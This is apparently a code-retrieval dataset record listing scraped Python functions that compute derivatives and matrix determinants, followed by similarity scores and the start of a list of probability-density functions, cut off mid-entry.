"def _derX(self, x, y, z):\n m = len(x)\n temp = np.zeros((m, self.funcCount))\n for j in range(self.funcCount):\n temp[:, j] = self.functions[j](x, y, z)\n i = self.argcompare(temp, axis=1)\n dfdx = np.zeros_like(x)\n for j in range(self.funcCount):\n c = i == j\n dfdx[c] = self.functions[j].derivativeX(x[c], y[c], z[c])\n return dfdx", "def det(v1, v2):\n\treturn v1[0] * v2[1] - v1[1] * v2[0]", "def activ_fn_derivative(z):\n return 1 - np.square(np.tanh(z))", "def getDerivativeSkeletonEqs(self):\n xs = np.array(self.XYProjections)[:,0]\n L = xs[-1] - xs[0]\n \n # Derivation\n xi = sy.symbols('xi')\n self.dudx_xyPlane = sy.diff(self.u_xyPlane, xi) / L\n \n # Then calculate the derivation equation on x-z plane\n self.dudx_xzPlane = sy.diff(self.u_xzPlane, xi) / L", "def get_derivative(self,var,g=None):\n if (g==None):g=self.g\n A=np.zeros([self.n+1,self.n])\n B=np.zeros([self.n+1])\n for i in range(self.n):\n B[i]=self.gamma*2.*g*self.N*(self.n-self.N)+np.sum([self.XXZ.Z(k,i)*(var[k]-var[i]) for k in range(self.n) if k!=i])\n A[self.n][i]=1\n for j in range(self.n):\n if(i==j): A[i][j]=2.*var[i]+2.+g*np.sum([self.XXZ.Z(k,i) for k in range(self.n) if k!=i])\n else: A[i][j]=-g*self.XXZ.Z(j,i)\n Ainv=np.linalg.pinv(A)\n der=np.dot(Ainv,B)\n return der", "def derivatives(self):\n self.rdot = self.v\n self.vdot[:,:] = 0.0\n self.udot[:] = 0.0\n\n t = time()\n for nl in self.nlists: \n nl.separations()\n #nl.apply_minimum_image()\n self.timing['pairsep time'] = (time() - t)\n\n t = time()\n if SPROPS:\n properties.spam_properties(self,self.nl_default \\\n ,self.h[0:self.n],self.hlr[0:self.n])\n self.timing['SPAM time'] = time() - t\n \n t = time()\n for force in self.forces:\n force.apply()\n self.timing['force time'] = time() - t\n \n if ADVECTIVE:\n self.rdot[:,:] = 0.0", "def derivative_activation(z):\n return activation(z) * (1 - activation(z))", "def det_matrix_2x2(m: list):\n return m[0][0]*m[1][1] - m[0][1]*m[1][0]", "def derivative(self, x):\n z = np.asarray(x)\n return (self._der(z.flatten())).reshape(z.shape)", "def _core_calc_degrad(self,bd,Ld) :\n\t\tdegrad = np.dot(Ld,bd) # Do matrix multiplication \n\t\tdegrad = np.exp(degrad) # Exponentiate to convert log to real\n\t\treturn degrad", "def derivative(a, y, z):\n return (a - y) * Sigmoid.derivative(z)", "def determinant(self) -> float:\n num_R, num_C = self.shape()\n assert num_R == num_C, f\"Determinant must be for a square matrix; this one is {self.shape()}.\"\n # -------------------------------------------------------\n # TODO: You write this one.\n # Note: this one should be recursive....\n if num_R == 1:\n return self.mat[0][0]\n det =0\n for i in range(num_R):\n det += self.mat[0][i] * self.get_minor(0,i).determinant() * (-1)**i\n return det\n pass # remove this when you add your code.\n # -------------------------------------------------------", "def Derivative(self, *args):\n return _Adaptor3d.Adaptor3d_InterFunc_Derivative(self, *args)", "def derivativeX(self, x, y):\n xa = np.asarray(x)\n ya = np.asarray(y)\n return (self._derX(xa.flatten(), ya.flatten())).reshape(xa.shape)", "def GetDerivative(self, *args):\n return _ITKCostFunctionsPython.itkSingleValuedCostFunction_GetDerivative(self, *args)", "def derivative(self, *args):\n if self.i_dim == 0:\n return np.ones_like(*args[0])\n else:\n return np.zeros_like(*args[0])", "def two_pt_deriv(tseries):\n dy = tseries.diff(2).shift(-1)\n dx = pd.Series(tseries.index).diff(2).shift(-1)\n return dy.apply(lambda x: x.values / dx.values, axis=0)", "def det_matrix(self):\n return np.linalg.det(self.take_matrix())", "def inner_product(self, tangent_vec_a, tangent_vec_b, base_point):\n inner_prod_mat = self.metric_matrix(base_point)\n aux = gs.einsum(\"...j,...jk->...k\", gs.conj(tangent_vec_a), inner_prod_mat)\n return gs.dot(aux, tangent_vec_b)", "def det(A):\n # Section 1: Establish n parameter and copy A\n n = len(A)\n AM = A[:]\n\n # Section 2: Row manipulate A into an upper triangle matrix\n for fd in range(n): # fd stands for focus diagonal\n if AM[fd][fd] == 0:\n AM[fd][fd] = 1.0e-18 # Cheating by adding zero + ~zero\n for i in range(fd+1, n): # skip row with fd in it.\n crScaler = AM[i][fd] / AM[fd][fd] # cr stands for \"current row\".\n for j in range(n): # cr - crScaler * fdRow, one element at a time.\n AM[i][j] = AM[i][j] - crScaler * AM[fd][j]\n\n # Section 3: Once AM is in upper triangle form ...\n product = 1.0\n for i in range(n):\n product *= AM[i][i] # ... product of diagonals is determinant\n\n return product", "def derivative_ex(dirichl_space, neumann_space, ep_in, ep_ex, kappa, operator_assembler):\n phi_id = sparse.identity(dirichl_space, dirichl_space, dirichl_space)\n dph_id = sparse.identity(neumann_space, neumann_space, neumann_space)\n ep = ep_ex/ep_in\n\n dF = laplace.double_layer(dirichl_space, dirichl_space, dirichl_space, assembler=operator_assembler)\n dP = modified_helmholtz.double_layer(dirichl_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)\n B = 1/ep * dF - dP\n\n F = laplace.single_layer(neumann_space, dirichl_space, dirichl_space, assembler=operator_assembler)\n P = modified_helmholtz.single_layer(neumann_space, dirichl_space, dirichl_space, kappa, assembler=operator_assembler)\n A = F - P\n\n ddF = laplace.hypersingular(dirichl_space, neumann_space, neumann_space, assembler=operator_assembler)\n ddP = modified_helmholtz.hypersingular(dirichl_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)\n D = 1/ep * (ddP - ddF)\n\n dF0 = laplace.adjoint_double_layer(neumann_space, neumann_space, neumann_space, assembler=operator_assembler)\n dP0 = modified_helmholtz.adjoint_double_layer(neumann_space, neumann_space, neumann_space, kappa, assembler=operator_assembler)\n C = dF0 - 1.0/ep*dP0\n\n A_sys = bempp.api.BlockedOperator(2, 2)\n A_sys[0, 0] = (0.5*(1.0 + (1.0/ep))*phi_id) + B\n A_sys[0, 1] = -A\n A_sys[1, 0] = D\n A_sys[1, 1] = (0.5*(1.0 + (1.0/ep))*dph_id) - C\n\n return A_sys", "def _derivatives(self, state, forces_moments):\n # extract the states\n pn = state.item(0)\n pe = state.item(1)\n pd = state.item(2)\n u = state.item(3)\n v = state.item(4)\n w = state.item(5)\n e0 = state.item(6)\n e1 = state.item(7)\n e2 = state.item(8)\n e3 = state.item(9)\n p = state.item(10)\n q = state.item(11)\n r = state.item(12)\n # extract forces/moments\n fx = forces_moments.item(0)\n fy = forces_moments.item(1)\n fz = forces_moments.item(2)\n l = forces_moments.item(3)\n m = forces_moments.item(4)\n n = forces_moments.item(5)\n\n # position kinematics\n pn_dot =\n pe_dot =\n pd_dot =\n\n # position dynamics\n u_dot =\n v_dot =\n w_dot =\n\n # rotational kinematics\n e0_dot =\n e1_dot =\n e2_dot =\n e3_dot =\n\n # rotatonal dynamics\n p_dot =\n q_dot =\n r_dot = \n\n # collect the derivative of the states\n x_dot = np.array([[pn_dot, pe_dot, pd_dot, u_dot, v_dot, w_dot,\n e0_dot, e1_dot, e2_dot, e3_dot, p_dot, q_dot, r_dot]]).T\n return x_dot", "def DerivMatrixExponential(dG, alpha, S, Sinv, D):\n (n1, n2) = dG.shape\n assert n1 == n2, \"dG is not a square matrix.\"\n n = n1\n assert S.shape == (n, n), 'S does not have the correct dimensions.'\n assert Sinv.shape == (n, n), 'S does not have the correct dimensions.'\n assert D.shape == (n, ), 'D does not have the correct dimensions.'\n assert isinstance(alpha, (int, float)) or alpha.shape == ()\n B = numpy.dot(numpy.dot(Sinv, dG), S)\n expalphaD = numpy.exp(alpha * D)\n V = numpy.ndarray((n, n))\n for x in range(n):\n for y in range(n):\n if x != y:\n V[x, y] = B[x, y] * (expalphaD[x] - expalphaD[y]) / (D[x] - D[y])\n else:\n V[x, y] = B[x, x] * alpha * expalphaD[x]\n return numpy.dot(numpy.dot(S, V), Sinv)", "def derivatives(self):\n self.rdot = self.v\n self.vdot[:,:] = 0.0\n \n for nl in self.nlists: \n nl.separations()\n \n for force in self.forces:\n force.apply()\n\n # Controllers is the new implementation of forces\n for controller in self.controllers:\n controller.apply()", "def newton_decent_directions(function, func_derivative, func_hessian, xk, A, P, b, q, t):\r\n # calculate steepest decent direction\r\n newton_dir = -np.dot(np.linalg.inv(func_hessian(x=xk, A=A, P=P, b=b, q=q, t=t)), func_derivative(x=xk, A=A, P=P, b=b, q=q, t=t))\r\n\r\n return newton_dir", "def ddf(self, y1: torch.Tensor, y2: torch.Tensor) -> torch.Tensor:\n out = torch.pow(y1, 2)\n mul = y1 * y2\n mul.exp_()\n\n div = mul.reciprocal()\n div.add_(mul).add_(2)\n out.div_(div)\n return out", "def determinant(x):\n if len(x) == len(x[0]):\n if len(x) == 2:\n return cross_multiply(x)\n else:\n val = 0\n alt = False\n for i in range(len(x)):\n tmp = x[1:]\n t1, t2 = tmp[0][:], tmp[1][:]\n _ = t1.pop(i), t2.pop(i)\n new_t = [t1, t2]\n print(new_t)\n x_multiply = cross_multiply(new_t)\n if val == 0:\n val = x[0][i] * x_multiply\n else:\n if alt:\n val = val + (x[0][i] * x_multiply)\n alt = False\n else:\n val = val - (x[0][i] * x_multiply)\n alt = True\n return val\n else:\n return 'matrix is not a square matrix.'", "def convDerivative(inImage: np.ndarray) -> (np.ndarray, np.ndarray, np.ndarray, np.ndarray):\r\n kernel_x = np.array([[0, 0, 0], [1, 0, -1], [0, 0, 0]])\r\n kernel_y = np.array([[0, 1, 0], [0, 0, 0], [0, -1, 0]])\r\n\r\n # derivative by rows:\r\n Ix = cv2.filter2D(inImage, -1, kernel_x) # , borderType=cv2.BORDER_REPLICATE\r\n\r\n # derivative by columns:\r\n Iy = cv2.filter2D(inImage, -1, kernel_y)\r\n\r\n eps = 0.0000000001\r\n magnitude = pow(Ix ** 2 + Iy ** 2, 0.5)\r\n direction = np.arctan(Iy / (Ix + eps))\r\n\r\n return direction, magnitude, Ix, Iy", "def z_dot_dot(self):\n \n # TODO 1\n # Calculate the vertical component of the acceleration\n # You might find get_thrust_and_moment helpful\n\n c, M_x = self.get_thrust_and_moment()\n phi = self.X[2]\n zdd = (self.g - c * np.cos(phi)) / self.m\n print (zdd)\n return zdd", "def eval_Dxy(self):\n\n return self.Xf - self.Yf", "def derivative(xi, x, y):\n yi = ((xi-x[1])+(xi-x[2]))/((x[0]-x[1])*(x[0]-x[2])) * y[0]\\\n +((xi-x[0])+(xi-x[2]))/((x[1]-x[0])*(x[1]-x[2])) * y[1]\\\n +((xi-x[0])+(xi-x[1]))/((x[2]-x[0])*(x[2]-x[1])) * y[2]\n return yi", "def derivative ( self ):\n return self.__derivative", "def derivative_given_y(self, y):\n\n return np.dot(y, np.subtract(1.0, y))", "def deriv(self, t: float, endBehavior: str = 'halt') -> Vector:\n return self.deriv_state(t,endBehavior)", "def get_bessel_derivative(self):\n return np.array([t.der_bessel for t in self._trc])", "def dK_dtheta(self,X,X2,target):\r\n if X2 is None: X2 = X\r\n FX = np.column_stack([f(X) for f in self.F])\r\n FX2 = np.column_stack([f(X2) for f in self.F])\r\n DER = np.zeros((self.n,self.n,self.n))\r\n for i in range(self.n):\r\n DER[i,i,i] = np.sqrt(self.weights[i])\r\n dw = self.variance * mdot(FX,DER,self.G_1,np.diag(np.sqrt(self.weights)),FX2.T)\r\n dv = mdot(FX,np.diag(np.sqrt(self.weights)),self.G_1,np.diag(np.sqrt(self.weights)),FX2.T)\r\n np.add(target[:,:,0],np.transpose(dv,(0,2,1)), target[:,:,0])\r\n np.add(target[:,:,1:],np.transpose(dw,(0,2,1)), target[:,:,1:])", "def determinant(self):\n if self.m != self.n:\n raise exc.LinearAlgebraError(\"cannot calculate the determinant of\"\n \"a non-square matrix\")\n if self.m == 1:\n return self[0, 0]\n # TODO: can we choose a better row/column to improve efficiency\n return functools.reduce(\n lambda x, y: x ^ y,\n [self[0, j] and\n self.subset([i for i in range(1, self.m)],\n [k for k in range(self.n) if k != j]).determinant\n for j in range(self.n)],\n )", "def cayley_menger_det_no_linalg(x2, y2, z2, xb2, yb2, zb2):\n xs = x2 + xb2\n ys = y2 + yb2\n zs = z2 + zb2\n buf1 = ys + zs\n buf1 -= xs\n buf2 = x2 * xb2\n buf1 *= buf2 # buf1 has first term, halved\n np.multiply(y2, yb2, out=buf2)\n buf3 = xs + zs\n buf3 -= ys\n buf2 *= buf3 # buf2 has second term\n buf1 += buf2 # buf1 is sum of two terms, halved\n np.multiply(z2, zb2, out=buf3)\n np.add(xs, ys, out=buf2) # reuse buf2\n buf2 -= zs\n buf3 *= buf2 # buf3 has third term\n buf1 += buf3 # buf1 is sum of 3 first terms, halved\n buf1 *= 2\n np.subtract(x2, xb2, out=buf2)\n np.subtract(y2, yb2, out=buf3)\n buf2 *= buf3\n np.subtract(z2, zb2, out=buf3)\n buf2 *= buf3\n buf1 += buf2 # buf1 is sum of 4 first terms\n np.multiply(xs, ys, out=buf3)\n buf3 *= zs\n buf1 -= buf3\n return buf1", "def derivative(self, cache):\n if self.__activation == 'sig':\n derivative = cache * (1 - cache)\n else:\n derivative = 1 - cache ** 2\n return derivative", "def deriv(self, t: float, endBehavior: str = 'halt') -> RigidTransform:\n res = GeodesicHermiteTrajectory.deriv(self,t,endBehavior)\n return self.to_se3(res[:12])", "def _derivative_(self, x, diff_param=None):\n return 2*exp(-x**2)/sqrt(pi)", "def _det(mat):\n\n return (mat[0][0] * (mat[1][1] * mat[2][2] - mat[1][2] * mat[2][1])\n + mat[0][1] * (mat[1][2] * mat[2][0] - mat[1][0] *\n mat[2][2]) + mat[0][2] * (mat[1][0] * mat[2][1] -\n mat[1][1] * mat[2][0]))", "def convert_deriv_to_inv(J,dpred):\n Jinv = -J /dpred**2\n # That /dpred**2 divides element-wise into every column the matrix via Python's broadcasting.\n return Jinv", "def determinant (self):\n if self.is_square:\n det = 1\n for idx, row in enumerate(echelon_form(self).rows()):\n det *= row[idx]\n return det\n else:\n raise NotImplementedError(\n \"Determinant only defined for square matrices.\")", "def determinant(v,w):\n return v[0] * w[1] - v[1] * w[0]", "def test_exp_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.exp(x/y)\n df_dxdy = lambda x, y: -(x*np.exp(x/y) + y*np.exp(x/y)) / y**3\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2),\n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n df_dxdy(1.5, 2.5))", "def deriv(self, t, x, u):\n \n # unpack some variables\n theta = x[2]\n v = u[0]\n vdiff = u[1]\n\n return np.r_[\n v * cos(theta), \n v * sin(theta), \n vdiff / self.w\n ]", "def det(self):\n if not self.is_endomorphism():\n raise ArithmeticError(\"Matrix morphism must be an endomorphism.\")\n return self.matrix().determinant()", "def d_beta_d_EDOT(self):\n eTheta = self.eTheta()\n a1 = (self.a1()).decompose()\n sinOmg = np.sin(self.omega())\n cosOmg = np.cos(self.omega())\n return a1/c.c*((-eTheta)/np.sqrt(1-eTheta**2)*cosOmg*self.tt0- \\\n (1-eTheta**2)**0.5*sinOmg*self.d_omega_d_par('EDOT'))", "def derivativeY(self, x, y):\n xa = np.asarray(x)\n ya = np.asarray(y)\n return (self._derY(xa.flatten(), ya.flatten())).reshape(xa.shape)", "def determinant(self):\n if self.m != self.n:\n raise exc.LinearAlgebraError(\"cannot calculate the determinant of\"\n \"a non-square matrix\")\n if self.m == 1:\n return self[0, 0]\n # TODO: can we choose a better row/column to improve efficiency\n return sum([self[0, j] * (-1 if j % 2 else 1) *\n self.subset([i for i in range(1, self.m)],\n [k for k in range(self.n) if k != j]).determinant\n for j in range(self.n)])", "def derFunc(self,x_vec):\n x=x_vec[0]\n y=x_vec[1]\n z=np.array([2*(self.x_0-x),2*(self.y_0-y)])\n return z*self.sfunc(x,y)", "def calc_formation_enthalpy(ergs_react,erg_prod,coeffs):\n if len(ergs_react) != len(coeffs):\n raise ValueError('len(ergs_react) != len(coeffs)')\n dH = erg_prod\n for i in range(len(ergs_react)):\n ei = ergs_react[i]\n ai = coeffs[i]\n dH -= ai*ei\n dH = -dH\n return dH", "def drag_der(t, params):\n t_final = tf.cast(params['t_final'].get_value(), dtype=tf.float64)\n sigma = tf.cast(params['sigma'].get_value(), dtype=tf.float64)\n norm = (tf.sqrt(2 * np.pi * sigma ** 2)\n * tf.math.erf(t_final / (np.sqrt(8) * sigma))\n - t_final * tf.exp(-t_final ** 2 / (8 * sigma ** 2)))\n offset = tf.exp(-t_final ** 2 / (8 * sigma ** 2))\n der = - 2 * (tf.exp(-(t - t_final / 2) ** 2 / (2 * sigma ** 2)) - offset) \\\n * (np.exp(-(t - t_final / 2) ** 2 / (2 * sigma ** 2))) \\\n * (t - t_final / 2) / sigma ** 2 / norm\n return der", "def eval_with_derivative(self, x):\n z = np.asarray(x)\n y, dydx = self._evalAndDer(z.flatten())\n return y.reshape(z.shape), dydx.reshape(z.shape)", "def diff_effector2(state, th0, alpha, beta, beta_p, p, d):\n dt_state = np.zeros_like(state)\n #print(len(state))\n if alpha == 1:\n for j in range(len(state)):\n if j == 0:\n dt_state[j] = p*beta*th0+2*beta_p*state[-1]-(beta_p+d[\"d_eff\"])*state[j]\n else:\n dt_state[j] = beta_p*state[j-1]- (beta_p+d[\"d_eff\"])*state[j] \n \n else: \n for j in range(len(state)):\n if j == 0:\n dt_state[j] = p*beta*th0 - (beta+d[\"d_prec\"])*state[j] \n elif j < (alpha-1):\n dt_state[j] = beta*state[j-1]-(beta+d[\"d_prec\"])*state[j] \n elif j == (alpha-1):\n # the problem with the 4 and 2 is that since differentiation takes 1 day it should divide twice giving 4 cells\n # however, if it has arrived in the final states if should double every half day\n dt_state[j] = beta*state[j-1]+2*beta_p*state[-1] - (d[\"d_eff\"]+beta_p)*state[j] \n\n else:\n assert j >= alpha\n dt_state[j] = beta_p*state[j-1]- (beta_p+d[\"d_eff\"])*state[j] \n \n return dt_state", "def _derivativeTerm(self):\n\n\t\treturn self._Kd * (self._getErrorFunction() - self._previousError) / self._dt", "def deriv(y, x):\n answer = np.zeros(len(y))\n answer[1:-1] = (y[2:] - y[:-2])/(x[2:] - x[:-2])\n return answer", "def determinant(self):\n det = 0\n # Check if is square\n # 检验其是否是方形矩阵\n if not self.is_square():\n raise(ValueError, \"Cannot calculate determinant of non-square matrix.\")\n if self.h > 2:\n raise(ValueError, \"Calculating determinant not implement for matrices largerer than 2x2\")\n\n # TODO - your code here\n\n # 这里仅实现了获取1x1 2x2 矩阵的det值\n # For Matrix 1x1\n if (self.h * self.w) == 1:\n det = self.grid[0][0]\n # For Matrix 2x2\n elif self.h == 2 & self.w == 2:\n det = self.g[1][1] * self.g[0][0] - self.g[0][1] * self.g[1][0]\n # In the future could implement determinant for matrix bigger\n else:\n raise(NotImplementedError, \"Calculating determinant not implement for matrices largerer than 2x2.\")\n return det", "def _compute_diag_H(self, t, index, update_derivatives=False, stationary=False):\r\n\r\n \"\"\"if delta_i~=delta_j:\r\n [h, dh_dD_i, dh_dD_j, dh_dsigma] = np.diag(simComputeH(t, index, t, index, update_derivatives=True, stationary=self.is_stationary))\r\n else:\r\n Decay = self.decay[index]\r\n if self.delay is not None:\r\n t = t - self.delay[index]\r\n \r\n t_squared = t*t\r\n half_sigma_decay = 0.5*self.sigma*Decay\r\n [ln_part_1, sign1] = ln_diff_erfs(half_sigma_decay + t/self.sigma,\r\n half_sigma_decay)\r\n \r\n [ln_part_2, sign2] = ln_diff_erfs(half_sigma_decay,\r\n half_sigma_decay - t/self.sigma)\r\n \r\n h = (sign1*np.exp(half_sigma_decay*half_sigma_decay\r\n + ln_part_1\r\n - log(Decay + D_j)) \r\n - sign2*np.exp(half_sigma_decay*half_sigma_decay\r\n - (Decay + D_j)*t\r\n + ln_part_2 \r\n - log(Decay + D_j)))\r\n \r\n sigma2 = self.sigma*self.sigma\r\n\r\n if update_derivatives:\r\n \r\n dh_dD_i = ((0.5*Decay*sigma2*(Decay + D_j)-1)*h \r\n + t*sign2*np.exp(\r\n half_sigma_decay*half_sigma_decay-(Decay+D_j)*t + ln_part_2\r\n )\r\n + self.sigma/np.sqrt(np.pi)*\r\n (-1 + np.exp(-t_squared/sigma2-Decay*t)\r\n + np.exp(-t_squared/sigma2-D_j*t)\r\n - np.exp(-(Decay + D_j)*t)))\r\n \r\n dh_dD_i = (dh_dD_i/(Decay+D_j)).real\r\n \r\n \r\n \r\n dh_dD_j = (t*sign2*np.exp(\r\n half_sigma_decay*half_sigma_decay-(Decay + D_j)*t+ln_part_2\r\n )\r\n -h)\r\n dh_dD_j = (dh_dD_j/(Decay + D_j)).real\r\n\r\n dh_dsigma = 0.5*Decay*Decay*self.sigma*h \\\r\n + 2/(np.sqrt(np.pi)*(Decay+D_j))\\\r\n *((-Decay/2) \\\r\n + (-t/sigma2+Decay/2)*np.exp(-t_squared/sigma2 - Decay*t) \\\r\n - (-t/sigma2-Decay/2)*np.exp(-t_squared/sigma2 - D_j*t) \\\r\n - Decay/2*np.exp(-(Decay+D_j)*t))\"\"\"\r\n pass", "def calc_det(m):\n det = m[0][0] * m [1][1] - (m[0][1] * m[1][0])\n return det", "def det(a, b, c):\n d = (b[0]*c[1]-c[0]*b[1])+(c[0]*a[1]-a[0]*c[1])+(a[0]*b[1]-a[1]*b[0])\n return d", "def _der(self, x):\n y, dydx = self._evalAndDer(x)\n return dydx # Sadly, this is the fastest / most convenient way...", "def _der(self, x):\n y, dydx = self._evalAndDer(x)\n return dydx # Sadly, this is the fastest / most convenient way...", "def determinant(self):\n if self.cols != self.rows:\n raise Exception ('Matrix is not square!')\n for i in range(self.rows):\n if self.values[i][i] == 0:\n raise Exception ('There is zero on the main diagonal')\n #TODO: Rearrange the lines, that the main diagonal don't have a zero values \n\n arr = self.values[:]\n for i in range(self.rows):\n for j in range(self.cols):\n diag = [arr[l][p] for p in range(self.cols) for l in range(self.rows) if l == p ]\n if i > j :\n arr2 = arr[i][j]/diag[j]\n arr1 = [round(x * arr2, 4) for x in arr[i-i+j]]\n arr[i] = map(lambda x,y: round(x - y, 4) , arr[i], arr1 )\n\n diag = [arr[l][p] for p in range(self.cols) for l in range(self.rows) if l == p ]\n det = 1\n for i in range(len(diag)):\n det *= diag[i]\n if det != 0 :\n return True\n else:\n return False", "def test_tan_2ndord_2vars():\n x, y = fwd.Variable(), fwd.Variable()\n f = fwd.tan(x/y)\n df_dxdy = lambda x, y: -(y/np.cos(x/y)**2 + 2*x*np.tan(x/y)/np.cos(x/y)**2) / y**3\n assert equals(f.derivative_at((x, x), {x: 1.5, y:2.5}, order=2),\n f.derivative_at( x, {x: 1.5, y:2.5}, order=2)) \n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n f.derivative_at((y, x), {x: 1.5, y:2.5}, order=2))\n assert equals(f.derivative_at((x, y), {x: 1.5, y:2.5}, order=2), \n df_dxdy(1.5, 2.5))", "def d_dx(self, points):\n dk_dx = np.zeros((points.shape[0] + 3, # i\n self.source.n_points, # k\n self.source.n_dims)) # l\n dk_dx[:-3, :] = self.kernel.d_dl(points)\n\n affine_derivative = np.array([[0, 0],\n [1, 0],\n [0, 1]])\n dk_dx[-3:, :] = affine_derivative[:, None]\n\n return np.einsum('ij, ikl -> klj', self.coefficients, dk_dx)" ]
[ "0.65636075", "0.6383123", "0.6320185", "0.6274132", "0.62254035", "0.6178101", "0.6175668", "0.6127627", "0.61223304", "0.61122054", "0.61108375", "0.60562176", "0.60325277", "0.6020855", "0.6019261", "0.6014277", "0.60129786", "0.60129786", "0.5989726", "0.59852016", "0.5982169", "0.59668463", "0.5935284", "0.59349674", "0.5933779", "0.5933281", "0.5933101", "0.5911815", "0.5894086", "0.5894086", "0.5883208", "0.5869818", "0.58537215", "0.5836323", "0.5817557", "0.581707", "0.579404", "0.57888615", "0.5774369", "0.57635266", "0.5742327", "0.57311964", "0.57257175", "0.5722962", "0.57120943", "0.5675959", "0.5674093", "0.5658675", "0.56448984", "0.5641573", "0.56340295", "0.5609833", "0.5601637", "0.5592169", "0.55877805", "0.55849713", "0.558355", "0.55789673", "0.55731833", "0.5572312", "0.55698544", "0.5568967", "0.55648446", "0.5562865", "0.5562257", "0.5552044", "0.5550566", "0.55479234", "0.55436414", "0.5526952", "0.55267024", "0.55226564", "0.55198276", "0.5518883", "0.55132955", "0.55126935", "0.5494363", "0.54918087", "0.54842645", "0.547967", "0.5474578", "0.546754", "0.5464515", "0.5463656", "0.5462883", "0.54595226", "0.54581445", "0.54516685", "0.5442006", "0.5440408", "0.5439934", "0.5437737", "0.5435537", "0.5433428", "0.5431702", "0.54278725", "0.54278725", "0.5425724", "0.54199255", "0.5413294" ]
0.6529994
1
Compute pdf at a fixed point on the support.
def pdf(x): return lambda point: self.information_manifold.point_to_pdf(point)(x)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def pdf(x, point):\n raise NotImplementedError(\"The pdf method has not yet been implemented.\")", "def pdf(self, x):\n raise NotImplementedError", "def pdf(self,x):\n returnPdf = self._distribution.pdf(x)\n return returnPdf", "def pdf(self,x):\n if self.base == 'natural':\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x\n else:\n pdfValue = 1./(self.upperBound-self.lowerBound) * 1./x * 1./math.log(10.)\n return pdfValue", "def pdf(self,x):\n pdfValue = self.pdfFunc(x)\n return pdfValue", "def pdf(self,x):\n if self.transformation:\n pdfValue = self.pdfInTransformedSpace(x)\n else:\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfValue = self._distribution.pdf(coordinate)\n return pdfValue", "def pdf(self, grid, dataSegment):\n temp = grid[0][:] # make copy of parameter grid\n temp[temp > 1.] = 0. # p < 1\n temp[temp < 0.] = 0. # p > 0\n\n if dataSegment[0]:\n pass # pdf = p\n else:\n temp = 1. - temp # pdf = 1 - p\n\n return temp", "def _compute_single_pdf(self, **kwargs):\n raise NotImplementedError", "def pdf(self, x):\n\t\treturn 1.5 * np.power(x,2) ##obtained after finding z from integrating x^2 from -1 to 1", "def pdf(self, grid, dataSegment):\n return np.exp(\n -((dataSegment[0] - grid[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(2. * np.pi * grid[1] ** 2.))", "def pdf(self,x):\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfValue = self._distribution.pdf(coordinate)\n return pdfValue", "def pdf(self,x):\n coordinate = distribution1D.vectord_cxx(len(x))\n for i in range(len(x)):\n coordinate[i] = x[i]\n pdfValue = self._distribution.pdf(coordinate)\n return pdfValue", "def c_pdf(self, x):\n\n assert x > 0\n\n # shortcut\n shape = self.shape\n loc = self.loc\n scale = self.scale\n xn = np.subtract(x, loc) / scale\n\n # update x\n ft = shape * xn ** (shape - 1) * np.exp(-xn ** shape)\n return ft / scale", "def pdf(self, grid, dataSegment):\n return np.exp(-((dataSegment[0, 0] - grid[0]) ** 2.) / (2. * dataSegment[0, 1] ** 2.) -\n .5 * np.log(2. * np.pi * dataSegment[0, 1] ** 2.))", "def pdf(self, grid, dataSegment):\n return np.exp(-(dataSegment[0] ** 2.) / (2. * grid[0] ** 2.) - .5 * np.log(2. * np.pi * grid[0] ** 2.))", "def pdf(self, grid, dataSegment):\n return np.exp(-((dataSegment[1] - grid[0] * dataSegment[0]) ** 2.) / (2. * grid[1] ** 2.) - .5 * np.log(\n 2. * np.pi * grid[1] ** 2.))", "def pdf(self, grid, dataSegment):\n return (grid[0] ** dataSegment[0]) * (np.exp(-grid[0])) / (np.math.factorial(dataSegment[0]))", "def pdf(self, grid, dataSegment):\n # create dictionary from list\n freeParameterDict = {key: value for key, value in zip(self.freeParameters, grid)}\n\n # merge free/fixed parameter dictionaries\n parameterDict = freeParameterDict.copy()\n parameterDict.update(self.fixedParameterDict)\n\n # scipy.stats differentiates between 'pdf' and 'pmf' for continuous and discrete variables, respectively\n if self.isContinuous:\n return self.rv.pdf(dataSegment[0], **parameterDict)\n else:\n return self.rv.pmf(dataSegment[0], **parameterDict)", "def pdf(self, grid, dataSegment):\n return self.density(dataSegment[0], *grid)", "def pdf(self, point: np.ndarray) -> float:\n return self._probs.dot([rv.pdf(point) for rv in self._rvs])", "def pdf(self, x, **kwargs):\n from scipy.stats import rv_continuous\n return self.rvdist.pdf(x, **kwargs) if rv_continuous in self.rvdist.__class__.__mro__ \\\n else self.rvdist.evaluate(x, **kwargs)", "def pdf(self, grid, dataSegment):\n r = grid[0]\n s = grid[1]\n sScaled = s*np.sqrt(1 - r**2.)\n return np.exp(-((dataSegment[1] - r * dataSegment[0]) ** 2.) / (2. * sScaled ** 2.) - .5 * np.log(\n 2. * np.pi * sScaled ** 2.))", "def point_to_pdf(self, point):\n geomstats.errors.check_belongs(point, self)\n point = gs.to_ndarray(point, to_ndim=2)\n return lambda x: self.pdf(x, point)", "def pdf(self, f, y, extra_data=None):\r\n link_f = self.gp_link.transf(f)\r\n return self.pdf_link(link_f, y, extra_data=extra_data)", "def pdf(self, value=None):\n if value is None:\n value = self.value\n return self.rv.pdf(\n value, *self._pymc_dists_to_value(self.args), **self.kwds\n )", "def pdf(self, x):\n theta = np.zeros(self.p)\n theta[:2] = x\n return self.prior.pdf(theta)*self.likelihood(theta)", "def pdfPR(self,x,p,r):\n\t\treturn gammaF(x + r) / (factorial(x)*gammaF(r)) * p**r * (1-p)**x", "def pdf(self, x):\n\n mean = self.mean\n stddev = self.stddev\n e = 2.7182818285\n pi = 3.1415926536\n\n exp = -1 * ((x - 